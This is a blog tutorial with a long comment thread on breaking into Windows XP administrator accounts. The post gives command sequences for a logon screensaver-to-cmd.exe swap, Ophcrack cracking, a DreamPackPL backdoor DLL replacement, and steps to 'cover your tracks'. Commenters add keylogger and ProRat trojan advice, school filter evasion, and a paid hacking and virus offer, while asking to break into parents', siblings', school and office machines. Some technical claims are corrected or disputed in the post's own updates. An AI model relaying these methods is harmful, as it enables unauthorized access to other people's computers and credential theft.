Tuesday, March 16, 2010

How To Hack Or Crack A Windows XP Administrator Password

Home About Advertise Archives Contact
Clazh | Technology News, Windows, Mac, Google, Internet, Software, Hacks, How To, Tutorials & Guides
Design Shop XHTML, CSS, Templates, Wordpress Themes. Downloads Code & Design Samples, Wordpress Themes. Subscribe 1247 Readers. Newsletter, Mobile Alerts, RSS Feed.
Apple Blogging Google Hardware Icons Internet iPhone Microsoft Open Source Software Tutorial Web-Design Wordpress
01
APR
07
How To Hack Or Crack A Windows XP Administrator Password
Arpit Jacob Print Email
Bookmark & Share
84 Comments
This is provided only for educational purpose it is a simple way to Recover, Hack or Crack the Window XP Administrator Password. There are different Methods that I have outlined below.
Windows XP Privilege Escalation Exploit
(Before you continue Read the Updates at the bottom)
Here are the steps involved to Hack the Window XP Administrator Password .
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
Go to Start –> Run –> Type in CMD
You will get a command prompt. Enter these commands the way it is given
cd\
cd\ windows\system32\temphack
copy logon.scr C:\windows\system32\logon.scr
copy cmd.exe C:\windows\system32\cmd.exe
exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.
Hack Or Crack A Windows XP Administrator Password Using OphCrack
Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.
Go to Ophcrack and download the live CD burn it to a disk and boot with it. It will depend on how strong the password is.
Recover The Password Using DreamPackPL
Thanks for the steps from Giftson
Steps to Hack into a Windows XP Computer without changing password:
Get physical access to the machine. Remember that it must have a CD or DVD drive.
Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm
Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
Use any burning program that can burn ISO images.
After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
Press “R” to install DreamPackPL.
Press “C” to install DreamPackPL by using the recovery console.
Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
Type “exit”, take out disk and reboot.
In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
Click the top graphic on the DreamPack menu and you will get a menu popup.
Go to commands and enable the options and enable the god command.
Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.
Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.
Recover All Windows Password Including Vista With Login Recovery
Login Recovery is a Online service that can help you to recover your Windows Password including Windows Vista.
There are three steps Involved
Download the Login Recovery Software extraction program to create a bootable floppy disk to read the password file.
(click here for a CD version)
Insert the disk into the computer you wish to recover passwords from and boot the computer to extract the encrypted passwords to the disk.
Put the disk into an Internet enabled computer, and upload the encrypted password file for decryption. (see uploads page)
This is a Paid service but Alternativly they Provide a free service which is available by waiting upto 48 hours (Only One free request every three months so be careful how you use it).
Favorites More
Categories [ Microsoft, Technology ] Tags [ Hacking, Security, Windows ]
Both comments and pings are currently closed.
84 Responses

hi good information i search many sites but it is very clear and the system which i have is limited priviliges so i cant able to create a file in system32 folder i downloaded the oph crack i cant able to boot from cd plz help me in case to break the admin privilages or to know admin without changing the password
Bunni Posted On Apr 18, 07

I Want A password Off adminstartor When Ill Use That The Password Will Go into I w8 4 ur Answer
John Posted On Apr 24, 07

can u please tell me how we can hack onto bebo without it being blocked at skool ?? get bak to me a.s.a.p thanx
Zakaenah Posted On Apr 27, 07

this a worst method any other ezay method would u have if yes than mail me
thks
Pradeep Posted On Apr 28, 07

to get access to bebo and other sites, look for proxy sites
votebigbird.com and orkuch.com is some proxy sites that can be used
Anon Posted On May 03, 07

none of dem sytes work in skool all the proxy sotes gt hacked how do i get on bebo now
if ne1 can elp me plz le me no
luff yooh all jaydee
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Berm_wifey_4_lyfe Posted On May 04, 07

Hey this is very clear except for step 2. How to could you insert the disk into the computer before turning it on. I know that this is a stupid question but plz get get back 2 me.
Russ James Posted On May 05, 07

Yo I’m using the login recovery method but there’s a problem. Whenever I try to upload the password using the pair of lines, it always fails because of a corrupt password file. Can u help me?
Russ James Posted On May 08, 07

yo sup maii nikkahz! juz askin how doh i get on bebo at skool?????? all tha webz n proxyz r blokked!
Ate Tay Posted On May 08, 07

to get blocked website at school, i use myinternetisblocked.com, i know it works for youtube myspace facebook and others, not sure about these…
-post back for feedback
Matt Posted On May 10, 07

Dear sir,
If u r a hacker then you will have to know that we are restricked to create a nw folder in system32 folder with in a limted user accounts…………
Dashydude Posted On May 11, 07

AJ,
Have you heard tht u can recover a password using caculator.
not the pocket ones that we get in India,…but high quality TI calculators
i know .. it wud be gud if i let u search on it.
Master Posted On May 12, 07

You could always use orphcrack.
Sauron Posted On May 13, 07

Sorry meant ophcrack.
This way does work but not on all computers.
I used it on one computer and it worked.
But I used it to get on an account on my moms computer and access was denied.
ophcrack is an interesting program like it, but it doesn’t ALWAYS get the passwords, mainly the ones with symbols are the ones that don’t read right.
As in it won’t find the password.
But for idiots that use words like “Peaches” it works.
Sauron Posted On May 13, 07

i forgot my password and ineed to get in to my account.theres only one more account and it is limmited
Sami Posted On May 17, 07

forgot my password and ineed to get in to my account.theres only one more account and it is limmited.what do i do??????????
Sami Posted On May 17, 07

You should be able to use this method on a limited account, if not check out,http://ophcrack.sourceforge.net/
Sauron Posted On May 17, 07

does anyone know how to get onto facebook from school when its blocked?
Kendra Posted On May 18, 07

what about limited accounts ? what about if i can not boot from anything ? what soft can i use to find, not to crack, the admin pass ? the bios is pass protected!
Marry Posted On May 26, 07

me and my wife are seperated i am listed as the owner on the computer windows xp home but before she left she set her self up as admin how do i change this its driving me nuts i cant do shit
Dale Posted On Jun 07, 07

i tried the one listed at the top of the page but when i get to a certain line it says access denied why?
Dale Posted On Jun 07, 07

my brother make my account as limited account but he has himself an administrator account is there is any way to hack his password or to make again my account as administrator
Abdullah Posted On Jun 10, 07

So this technique doesnt work at the particular school I attend. Dos says something about to many parameters to fill. And the file not actually existing.
Kal Posted On Jun 14, 07

well, it didt work.
Cab_Axial Posted On Jun 24, 07

the Windows XP Privilege Escalation Exploit way sounds abit confusing to me actually it sounds like shit,
try ERD Commander 2005 v5.0 BOOT CD its very easy to use you can download this file from ares p2p thats where I got my file from and oh yes youll need a iso burner to make your boot cd once youve burnt your boot cd all you have to do us reboot your machine erd commander boots up into a windows like state interface all you need to do then is use the wizard in start thats it within seconds you will reset your admin password no copy and pasting writing scripts or dos command changing or what ever shit even a kid can use this tool thats how simple it is.
Monkeysee Posted On Jun 26, 07

this guy who subitted this thread starter sounds like an idiot he doesn’t even respond to any of these follow up questions it kinda makes me think that hes copied and pasted this post off another site or what ever and doesn’t even know how to use his bullshit program that hes recommended I cant stand these kinds of idiots
Monkeysee Posted On Jun 26, 07

@monkeysee:
…try ERD Commander 2005 v5.0 BOOT CD its …
1. For your ERD Boot CD, you need to have a CD drive on the system. This is not always the case, especially in offices.
…sounds like an idiot he doesn’t even respond to any of these follow up questions …
2. You never RAISED any questions which needed to be answered. So DON’T flame. Be a nice guy when you enter someone’s house.
…copied and pasted this post off another site…
3. Read things properly (a) to know that he’s mentioned the sites from which he’s used the data, (b) to avoid any CONFUSION in understanding simple lines in english.
4. I don’t really like to do this but next time you wish to suggest your skript kiddi3 thingy, please leave a link to your url. I don’t really prefer anonymous flames.
5. What Arpit has written is meant for a BEGINNER level audience. Now again, if you wish to see something really really in action, you might want to read the SAM file by writing your own code (no Cain, Ophcrack etc.), get the hashes, and crack them using Rainbow tables… Oh! wait. You might want to code your own Rainbow table generator. :)
Bipin 3~ Upadhyay Posted On Jun 27, 07

this is really apeared to be a nice trick.
i will definatly try it.
as an cyber security expert it may going to help me lot.
Jitendra Ukhardu Chavhan Posted On Jul 05, 07

Thx for all the info m8 but i’ve got 1 problem. My dad is the computer administrator and i’ve made a bet with him that i could crack his user account. I can access a limited account but when i tried the command promt thing (*first instructions) it didnt let me create the folder. Pls help me i really need help!
Eriko Posted On Jul 15, 07

@Eriko:
Suggestion: Try using a keylogger.
Advice:
1. Do no follow the suggestion given above. It might pi** him off.
2. Never mess with parents and females.
Bipin 3~ Upadhyay Posted On Jul 16, 07

everythings fine but i just cant open system 32 from dos in my limited account
San Posted On Jul 18, 07

i have a problem in login windows xp
some one change my administrator password to login windows xp . i have a difficulty to enter windows xp
now how can i enter in windows xp please help me.
thanks
Suresh Panchal Posted On Jul 24, 07

I want a particular password which I can enter any Windows Xp
Adil Posted On Jul 27, 07

good information i tried to go through but i am always faced with thus
a duplicated name exit or file cannot be found… what should be the first thing i should do ?
thanks looking forward on your usual assistance
Bingi Man Posted On Jul 29, 07

this guy wrote this for begginners and it’s quite good, if your advanced then try booting the computer with something that will give you access to the hard disks, like Puppy or Austrumi or even DOS and extract the sam file to a convenient location, then crack the SAM with LCP or something, extract the hash and rainbow it
Mini Posted On Jul 30, 07

this process is successful
Jitendra Posted On Aug 31, 07

Hey kids want to now how to get on your limited account with time restrictions well listen up before you log on unplug the network cable and then log on then plug the network cable back in That easy!
Corey Posted On Sep 01, 07

Do anybody know how to hack any computer, lol i want to know, i f you know how to hack a computer from far away send an email to mikej941126@hotmail.com If you know send it quick, i will send you a thank you note and i will add you at my email
Themajestic Posted On Sep 02, 07

Ok please no more noobs call getting on to a website through a proxy call it hacking, and please read the methods at the top before just posting things like “how do I get the admin password?”.
Anyone having genuine problems I can recommend Ophcrack as most people, schools etc do not bother to set up a bios password which will allow you to set the CD as the default boot device by pressing F2/F12/DEL at startup to get into the bios menu. Once you have done this it usually takes about 10-15 minutes to boot up and get the password.
This is a particularly easy and clean method of getting the admin password and I recommend it to anyone, especially noobs as it has a GUI.
Bob Posted On Sep 03, 07

The only thing that comes on the monitor is the password request. Cannot go anywhere else……. don’t know the password though…… what do i do? All these instructions don’t help me….. cause i can’t even get past the password request……….what should i do?
Evey Posted On Sep 04, 07

Get on a website @ school by opening CMD then typing “ping sitenamehere” (eg. “ping bebo.com” minus quotations) Then type the IP address into an internet browser after “http://”
Pat Posted On Sep 13, 07

FRIKIN PIMP
Uriel Carbajal Posted On Sep 14, 07

anyone knows how to crack passwords in a network system?
ophcrack can only crack some passwords on the computer…
PandaWarlord@Hotmail.Com Posted On Sep 18, 07

I’m the Systems Administrator at our school, but sometimes the head admin changes the passwords and doesn’t give them to us. I have had the most success with keyloggers. they seem to always work.
And yes! I know you cant install things on a school computer with a limited account. BUT! you can install it on a Flash drive or External Hard disk. do it at home that way if it needs special file permissions it will be able to access them. then bring that said drive to school plug it in and boot the keylogger. a good one will run in the background and usually wont be found by an antivius program.
convince them to type the password for some reason… I said I needed to install drivers for my camera. and the log got it right away!!
Have fun! and don’t get caught!!
Uber@HAXoR
Uber@HAXoR Posted On Sep 23, 07

please send me idea to hack password of administrator of computer with xp
Cool Posted On Sep 24, 07

How can I get or crack Administrative rights as I am on a office network. We have no rights at all, cant instal or unistal. please help. is there any that i can get or crack network administrator rights or password. thanks
Thorn Posted On Sep 25, 07

mmm, this does not work for me on my latest PC. windows.system32 is not writable.
Works fine on old pc though.
Denied Posted On Sep 29, 07

forgot to ask: does any one now how to:
backup the password file,
replace it with a password file which has a known admin password
then you can do whatever you like
then restored the old one
Denied Posted On Sep 29, 07

You can access one of the proxy sites I made at school, just dont let anyone see you doing it and you have a way to get around school blocking software for life. goto
http://66.212.18.5/portal/browse.php
you will be able to goto myspace and other sites just type the url in were myspace.com is and click go.
Hackmaster Posted On Oct 22, 07

If anyone is intrested in a personal hacker email me at internet_legal_services@hotmail.com
First hack is free, a 12 month membership of hacks is 30 us dollars.
Also with 12 month membership downloadable viruses.
Hackmaster Posted On Oct 22, 07

Is the link (http://www.d–b.webpark.pl/dreampackpl_en.htm) bad? I used Firefox and IE but there were errors on both browsers. Can anyone send me the .iso image please…?
PandaWarlord@Hotmail.Com Posted On Oct 23, 07

To Hack Into Bebo,Myspace And Etc Go To Google And Out In gpass1.com/proxy
Trevonte Posted On Oct 30, 07

please send me idea to hack password of administrator of computer with xp when my account is limited
Wcr Posted On Nov 03, 07

how to get windows xp password file while my account is limited
Wcr Posted On Nov 03, 07

can u tell me some what clear to do it..!
Kar Posted On Nov 06, 07

didnt work it said access denied
Raj Posted On Nov 08, 07

in how to hack password on number 8 the computer denys the access what should i do
Kaya Posted On Nov 12, 07

I have a system and i havn’t xp cd now and i forgot my administrator password or user account password,can i againg access my system without format my system ? I’m waiting for your answer.
Dharm Posted On Nov 13, 07

Easy.A dumb Admin. kept Banning me so i gave him a good hacking
Yoshitsune Asakura Posted On Nov 16, 07

Hey,i tried to hack again,but the computer said that ”the syntax of the command is incorrect”and it also said”duplicate file exists or has been copied’’someone please reply and explain to me what I did wrong.thank you.
Yoshitsune Asakura Posted On Nov 16, 07

i began hacking again,but the computer said”the syntax of the command is incorrect’’some one please post back and explain what i did wrong cuz this never happened before.
Yoshitsune Asakura Posted On Nov 16, 07

so complicated…heres the easiest way..goto run, type cmd, type net users administrator then press enter, enter now any password you want
Bill Posted On Nov 20, 07

i forgot, after administrator type * and thats all
Bill Posted On Nov 21, 07

bill, this only works if you already have administrative rights.(which really defeats the purpose of doing it since you already have admin access.)
Pandawarlord@Hotmail.Com Posted On Nov 22, 07

thats true pandawatord…. but if youre running as guest or without admin prive… you donot have administrative rights to create directory such as “temphack” or any other, You cant do hacking afterall unless you’ll pull it out the HDD. the purpose of this is if you donot know the password of administrator or any user of the PC.
If you are one of the users with administrative rights, you can do this or to any other users. I hope, I shared something
Bill Posted On Nov 23, 07

Whoever wrote the explanation for this doesn’t know a damn thing about cmd. MKDIR or MD are commands that create folders. *Sigh* I knew that when I was like 10 years old…
Not Telling Posted On Dec 04, 07

how to crack time ristriction on computer at cybercafe
Umesh Posted On Dec 26, 07

This does not work for me, I assume it’s becuase a .scr file isn’t loaded like an exe ??? I’ve tried command.com too which seems like the right one to use if this were going to work, maybe I just like trying to sound smart.
DerreK Posted On Jan 04, 08

Hello, i am no expert but until i recently converted to OSX i have been a long term windows user. As for accessing a standalone NT based windows machine (i.e. NT, 2000, XP, VISTA) you use the login command prompt method. In my personal opinion if you are not savvy enough to know the workaround for the NTFS file security then you should not even attempt to “hack” these computers.
As for the banned websites, the chances are that your internet settings are configured to run through a ISA server, most of which are PROXY based. In this case i would recommend using a WMI or VBS script that delegates system level control and changes the setting therefore bypassing the GPO that enforced it. Also for those that are aware there are various group policy enumeration exploits that can be initiated from a client machine.
I will warn anybody that reads this, that using any of the above techniques without written permission is a breach of the various computer security laws and data protection acts. I was caught for using unauthorised scripts and GPO exploits my by previous school, i very closely escaped a criminal record. I am 16.
Happy Hacking
n00bs
Jack Hunt Posted On Jan 05, 08

This is a very good hack I actually used it sometime back for personal gain but, about the blocked websites in schools you can just find proxy servers around the Internet just as useful as what Mr.Hunt had to say.
Jeff Posted On Jan 07, 08

i need help my uncle set our computer up and i dont have downloading privliges and he set up to admin acounts so i cant use the F8 trick or the command net user admin1234 trick either i have been looking hard but i cant seem to find any way around this im truly stuck get back to ma asap…..plzzzzzzz.
Aboyinneed Posted On Jan 08, 08

i need help my uncle set our computer up and i dont have downloading privliges and he set up two admin acounts so i cant use the F8 trick or the command net user admin1234 trick either i have been looking hard but i cant seem to find any way around this im truly stuck get back to ma asap…..plzzzzzzz.
Aboyinneed Posted On Jan 08, 08

sorry to be so buggy. but i have another issue, internet explorer 7 was installed on my computer and now when i try to go to certain sites it most of the time wont let me on and if it does it looks all white with blue border like my myspace my aol email etc… i really need help plzzz get back to me asap.
Aboyinneed Posted On Jan 08, 08

i wanna knw abt how can i get Proxies..which is uses in Yahoo id Cracker??Waiting for ya Reply..Tyvm
John Posted On Jan 10, 08

does this method delete the current password or just bypass it? kuz i dont want anyone to find out i logged on. thanks
Andy Posted On Jan 13, 08

If you want an application that bypasses all passwords, download “windows key” or “jtr”. Win Commander is also good. All you have to do with these applications is boot them as an ISO from cd and it will delete all password hashes from the system…. there is no way to extract a password as that would take months using a brute force attack.
TO ALL!!!! Posted On Jan 16, 08

i want to change pirated window xp into valid window xp
what to do Plz help me
Raghav Posted On Jan 20, 08

YOU ALL ARE NOOBS, IF YOU ACTUALLY KNOW ANYTHING ABOUT COMPUTERS YOU CAN USE THE FIRST METHOD EXPLAINED, FIRST TO THE ONE TRUE IDIOT I SAW “SYSTEM 32″ DOESNT HAVE A SPACE “SYSTEM32″ IF CMD.EXE DOESNT WORK USE COMMAND.COM, IF THE COMPUTER IS ON A NETWORK WHEN YOU ENTER YOUR LOGIN INFO… UNPLUG THE ETHERNET CORD AS SOON AS IT STARTS LOADING, USUALLY GIVES YOU ADMIN RIGHTS,
PEACE OUT BITCHES!
MastRHakeR Posted On Feb 11, 08

O.K newbies if you need to crack a fucking password i suggest you get a program called ProRat(there are many versions, each works slightly diff. and has diff features)burn it onto a cd/ get on your computer limited access.if your having trouble downloading do it a friends house and jus save prorat to cd… download the prorat client/your anti-virus will go off,. just download it anyway. pay attention to the filename youll need to delete it manually later)after you download the client on your computer/ open the prorat program., this program is much like a trojan in the fact that you can do alot more than just get passwords but for efforts sake we will go with this. scroll in the program and look for the “get passwords” this feature tells the client/intruder to look in your computers system files and retrieve the pass words which displays them from pro rat to you.,. after you have retrieved your passwords. go to start/ click search/ then search for the client file you downloaded and delete it., the restart your computer with the passwords in hand,. PRORAT is just one great way of cracking/hacking., the tutorials on this site are very well written and very precise,., I love educational information..-I.T HONORS STUDENT
p.s you will get prorat off of ares or bit-torrent(BE CAREFUL WHEN SEARCHING FOR THESE KINDS OF PROGRAMS THATS HOW PEOPLE LIKE ME GET YOU NEWBIES)
ITPRO Posted On Feb 23, 08

when all else fails join the crowd., this is how to keep from being hacked.,., Never give out personal info to anyone., emails are a dime a dozen and are merely unimportant if you dont use the internet for business so if your a casual user and dont bank or buy online. a hacked email is a hacked email find another provider and be even more careful., never ever let people play with your computer they are too expensive to be treated like toys or for your buddy jonny to be downloading a cool jam and at the same time downloading a file that has been tagged with a client that allows me to see everything you will do simply by clicking “YES” when your comp. prompts “ARE YOU SURE YOU WANT TO DOWNLOAD”. IF a fle looks suspicious dont download it. Example REAL CRACKED APP.
Photoshopcs3……545mb
Photoshopcs3……612mb
Photoshopcs3……589mb
Examples of fakes..(TYPICALLY APPLIES FOR ALL)
Photoshopcs3……121 kb
Photoshopcs3……1029 kb
photoshopcs3……2.2 mb
fake program files are how most hackers invade your box.,. Hackers arent stupid and hacking is illegal no real hacker is ever going to admit it. Its a lowly job but someone has to do it haha., lets keep it moving if you bank or buy online and it reqires credit or social sec #’s make sure you are over a secure connection., in most cases even if you are infected with a virus spyware etc the information you send through a secure server wiill be encrypted and decrypted later by the people who recieve your info., moving on PASSWORDS,. there are people everyday that wake up and say HAh! i want to hack a password., get online with thier fancy lil programs and start playing away.,. lemme show you how to stop that shit right now., most coders not all but most will make passwords crackers based off of dictionaries so a passwrod like “holydiver” would be an easy hack as opposed to a password of “canyon1″.,always add number or txt your self like i had a password that won me a lil competition in school NO ONE CRACKED IT and all it was ” I wnT 2 C You try” the password included 5 spaces a number and only 2 recognisable words., it wouldnt have been worth thier precious time to fool with it. they will give up and go on.
Every now and the you have the occasional hard ass that thinks he is the man with a computer and will figure out some way to hack and mess your stuff up.,. remember its alot easier to replace information but not replacing a computer or repair bills.,. simply re-format your computer if you think there is something major wrong with it.,., that being said i am done preaching…I.T HONORS STUDENT
ITPRO Posted On Feb 23, 08

tell me how to edit system32 in limited account.and tell me what means “hash”
Dil Posted On Feb 27, 08

The system cannot find logon.scr
STFU!!!
JW Posted On Mar 21, 08

Try using the safemode administrator to gain acess to the permnissions of the user accounts on the PC. ive fixed 2 computers this way.
Sinphas Posted On Mar 27, 08

I have tried this and i am not able to get the system32 part to work i have limited priveledges so i think that is reason feed back plz
Tom Posted On Apr 11, 08
Trackbacks/Pingbacks
Scribez How to Hack a Window XP Administrator Password «

RSS Newsletter
Arpit Jacob's Twitter ID\m/ RT @rishi Hey Arpit. Just dropped by to say that you've done awesome work with ZetaLight. The portal looks just too awesome. Congrats!
Get A Free Ad SpotAd Spot Available
Related posts
Recover Lost Forgotten Windows XP Administrator Password
Windows 7 Activation Key Crack By Hackers, Chew WGA & RemoveWGA
Myspace Hack : Profile Url And MySpace Email
How To Hack Myspace Private Profile Picture And Video
Windows Live Suite All Live Products In One?

Tags
Analytics Apple Blogging Download FireFox Free General Google Hacking How To Internet iPhone Mac OSX Microsoft Open Source Photos Plugins Programming Security Social-Networks Software Statistics Templates Themes Tips Tutorial Videos Web 2.0 Web-Design Web-Development Web-Hosting Web-Standards Windows Wordpress
Designed by Arpit Jacob | © Copyright | Disclaimer | Contact Contact Arpit Jacob Arpit Jacob On Facebook Arpit Jacob On Twitter Arpit Jacob On Google
';

1 comment: